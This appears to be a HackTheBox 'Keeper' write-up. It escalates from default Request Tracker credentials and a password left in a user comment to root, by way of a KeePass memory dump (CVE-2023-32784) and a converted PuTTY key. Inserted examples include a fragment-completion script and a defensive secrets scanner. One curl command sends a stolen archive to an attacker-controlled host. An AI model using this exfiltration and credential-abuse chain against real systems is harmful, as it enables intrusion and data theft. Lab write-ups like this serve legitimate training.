Default credentials and a comment field that should never have held a password - two very human mistakes that open the door all the way to root.

Machine info

Name: Keeper
Platform: HackTheBox
OS: Linux
Difficulty: Easy

TL;DR

  • Web server redirects to tickets.keeper.htb running Request Tracker (RT) - default credentials (root:password) work
  • A user profile comment reads “Initial password set to Welcome2023!” - SSH access as lnorgaard
  • Home directory contains RT30000.zip with a KeePass dump and .kdbx file
  • keepass_dump recovers a partial master password; context clues complete it
  • KeePass vault holds a PuTTY SSH key for root - convert and log in

Recon

Nmap

nmap -sV -sC -Pn -A 10.129.229.41

Nmap results

Ports 22 (SSH) and 80 (HTTP). Nginx 1.18.0 on Ubuntu.


Enumeration

Request Tracker

Visiting the IP redirects immediately:

Browser showing tickets.keeper.htb redirect

After adding keeper.htb and tickets.keeper.htb to /etc/hosts, the login page loads:

RT login page

A quick search for the default credentials of Best Practical’s Request Tracker:

RT default credentials: root / password

root:password - and it works. Once in, browsing the Users tab reveals a user named lnorgaard. Inside her profile, the Comments field has a message left by an admin:

User profile comment with Welcome2023! password

“New user. Initial password set to Welcome2023!” - a classic ITSM footgun.


Foothold

SSH as lnorgaard

ssh lnorgaard@keeper.htb

SSH login as lnorgaard

Inside the home directory:

Home directory listing and user.txt

user.txt and RT30000.zip. The zip is the interesting one.


Privilege Escalation

KeePass dump analysis

Unzipping the archive:

Unzipping RT30000.zip

Two files: KeePassDumpFull.dmp (a memory dump) and passcodes.kdbx (the KeePass database). Transfer them to Kali:

Uploading RT30000.zip to Kali

# on the target
curl -X POST 10.10.14.208/upload -F "files=@RT30000.zip" --insecure

# on Kali - simple upload receiver
python3 -m uploadserver

Using keepass_dump to extract the master password from the memory dump:

keepass_dump partial output

The tool recovers most characters but the first one is marked {UNKNOWN}. The extracted fragment reads: {UNKNOWN}dgrd med flde.

Recovering the missing character

That looks like it could be a word in a foreign language. Searching for it:

Google showing Rodgrod med flode

“Rodgrod med flode” - a traditional Danish dessert. The lnorgaard user profile listed her language as Danish. The full master password is rødgrød med fløde.
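The completion step above is done by eye and a search engine, but it is really a wildcard match: the dump tool marks one character as {UNKNOWN}, and, judging from the fragment against the final password, characters outside ASCII (the two ø) are simply absent from the fragment rather than marked. The following is an added example, not part of the original writeup and not the keepass_dump tool's own code; it turns a fragment into a pattern and checks a constructed candidate list against it. The candidate phrases and the assumption that non-ASCII characters are dropped from the fragment are assumptions made for this example.

```python
import re

# Placeholder the dump tool emits for a character it could not recover (as quoted on the page).
UNKNOWN = "{UNKNOWN}"


def ascii_skeleton(text: str) -> str:
    """Drop every non-ASCII character from a candidate phrase.

    Assumption for this example: the recovered fragment contains only the
    ASCII characters of the original, with non-ASCII ones missing entirely.
    """
    return "".join(ch for ch in text if ord(ch) < 128)


def fragment_to_regex(fragment: str) -> re.Pattern:
    """Build a regex from a fragment such as '{UNKNOWN}dgrd med flde'.

    Each {UNKNOWN} token matches exactly one character; everything else is literal.
    """
    parts = fragment.split(UNKNOWN)
    pattern = ".".join(re.escape(p) for p in parts)
    return re.compile(f"^{pattern}$")


def complete_fragment(fragment: str, candidates: list[str]) -> list[str]:
    """Return the candidates whose ASCII skeleton fits the fragment's wildcard pattern."""
    rx = fragment_to_regex(fragment)
    return [c for c in candidates if rx.match(ascii_skeleton(c))]


# Constructed candidate list: a few Danish dishes, only one of which fits the fragment.
SAMPLE_CANDIDATES = [
    "rødgrød med fløde",
    "rugbrød med smør",
    "rødgrød med flødeskum",
    "grød med fløde",
]

if __name__ == "__main__":
    for hit in complete_fragment("{UNKNOWN}dgrd med flde", SAMPLE_CANDIDATES):
        print("candidate:", hit)
```

Because the length check is exact, phrases that merely share a prefix (the flødeskum variant) are rejected; a single {UNKNOWN} matches the leading r, and the dropped ø characters account for the difference in length between fragment and phrase.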

Opening the KeePass vault

keepass2 passcodes.kdbx

KeePass2 opening the database

KeePass database contents showing PuTTY key for root

The database has an entry for root on keeper.htb with a PuTTY-format SSH private key in the notes field.

Converting PuTTY key to OpenSSH and logging in

PuTTY keys (.ppk) are not directly usable with OpenSSH. Convert it first:

puttygen id_rsa -O private-openssh -o id_rsa2

puttygen conversion and root SSH login

ssh root@keeper.htb -i id_rsa2

Root shell.


Takeaways (for OSCP)

  • Default credentials on internal tooling are almost always worth trying. Request Tracker, Gitea, Grafana, phpMyAdmin - they all ship with documented defaults and admins often forget to change them.
  • Comment/description fields in user management systems leak credentials constantly. In real engagements, HR and IT portals are a goldmine for this.
  • Memory dumps of running applications can yield credentials. KeePass CVE-2023-32784 is patched now, but the technique - dumping a process and searching for secrets in memory - applies broadly.
  • PuTTY keys are a format mismatch trap. puttygen is the conversion tool; remember it for exams.
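Two of the takeaways (credentials in comment fields, a PuTTY private key sitting in a notes field) are the kind of thing a defender can sweep for routinely. The following is an added example, not from the original writeup or from Request Tracker or KeePass: a small scanner that runs a few patterns over the free-text fields of exported user or vault records and reports redacted findings. The record set, the field names and the patterns are constructed for this example; the password hit mirrors the comment quoted above, and the key hit mirrors a PuTTY key pasted into a notes field.

```python
import re
from dataclasses import dataclass

# Things that should never sit in a free-text profile or notes field.
# Constructed for this example; extend with your own tokens and formats.
PATTERNS = {
    "password-in-text": re.compile(
        r"(?i)\b(?:initial\s+)?(?:password|passwd|pwd)\s*(?:is|set\s+to|[:=])\s*(\S+)"
    ),
    "putty-private-key": re.compile(r"^PuTTY-User-Key-File-\d+:", re.MULTILINE),
    "openssh-private-key": re.compile(r"-----BEGIN (?:OPENSSH|RSA|EC|DSA) PRIVATE KEY-----"),
}


@dataclass(frozen=True)
class Finding:
    record: str    # which user / vault entry
    field: str     # which free-text field
    kind: str      # pattern name
    evidence: str  # redacted snippet, safe to put in a ticket


def redact(secret: str) -> str:
    """Keep two leading characters so the finding can be triaged without re-leaking the value."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_fields(records: dict[str, dict[str, str]]) -> list[Finding]:
    """Run every pattern over every free-text field and collect findings.

    Patterns with a capture group have that group redacted; header-style
    patterns (key file magic lines) are reported as matched.
    """
    findings = []
    for record, fields in records.items():
        for field, text in fields.items():
            for kind, rx in PATTERNS.items():
                m = rx.search(text)
                if not m:
                    continue
                evidence = redact(m.group(1)) if m.lastindex else m.group(0)
                findings.append(Finding(record, field, kind, evidence))
    return findings


# Constructed sample export: one leaked password, one pasted PuTTY key, one harmless note.
SAMPLE_RECORDS = {
    "lnorgaard": {"comments": "New user. Initial password set to Welcome2023!"},
    "root@keeper.htb (vault entry)": {
        "notes": "PuTTY-User-Key-File-3: ssh-rsa\nEncryption: none\nComment: rsa-key\n<base64 omitted>"
    },
    "jdoe": {"comments": "Moved to the Copenhagen office in May."},
}

if __name__ == "__main__":
    for f in scan_fields(SAMPLE_RECORDS):
        print(f"{f.record} [{f.field}] {f.kind}: {f.evidence}")
```

Run it over a periodic export of user profiles and vault notes rather than the live systems, and feed the findings to whoever owns onboarding: the fix is a process one (temporary passwords delivered out of band and rotated on first login, keys kept in the key field of the vault, not the notes), and the scanner only tells you where that process has slipped.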
